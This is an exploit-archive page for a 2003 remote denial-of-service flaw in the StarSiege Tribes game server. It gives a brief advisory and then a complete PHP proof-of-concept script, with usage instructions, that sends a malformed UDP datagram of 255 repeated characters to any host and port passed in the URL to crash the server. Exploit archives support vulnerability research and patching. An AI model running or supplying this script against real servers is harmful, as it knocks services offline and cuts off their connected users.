header-logo
Suggest Exploit
vendor:
StarSiege Tribes
by:
st0ic
7.5
CVSS
HIGH
Remotely Triggered Denial of Service
N/A
CWE
Product Name: StarSiege Tribes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

StarSiege Tribes Game Server Denial of Service Vulnerability

The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system.

Mitigation:

N/A
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8184/info
 
StarSiege Tribes Game Server has been reported prone to a remotely triggered denial of service vulnerability.
 
The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system.

<?php
/* 
Author: st0ic <st0ic@fsix.net>
Website: http://www.fsix.net/
Name: byebye_tribes.php
Original Date: 07/14/2003
Purpose: POC "StarSiege: Tribes" DoS

Usage: Call it from a browser once its uploaded on a server
with PHP installed:

http://host/byebye_tribes.php?host=127.0.0.1&port=28001

Note - global variables must be enabled in php.ini (yes... I 
know thats bad too)

Stuff:
Yeah... too lazy to fine tune it, maybe someone else can
throw in HTML forms to give it a little interface ;-).
*/

$fp = fsockopen("udp://$host", $port, $errno, $errstr, 30);
if (!$fp) 
{
	echo "$errstr ($errno)<br>\n";
	exit;
}
else
{
	$char = "a";
	for($a = 0; $a < 255; $a++)
		$data = $data.$char;

	if(fputs ($fp, $data) )
		echo "successful<br>";
	else
		echo "error<br>";
}
?>
cqrsecured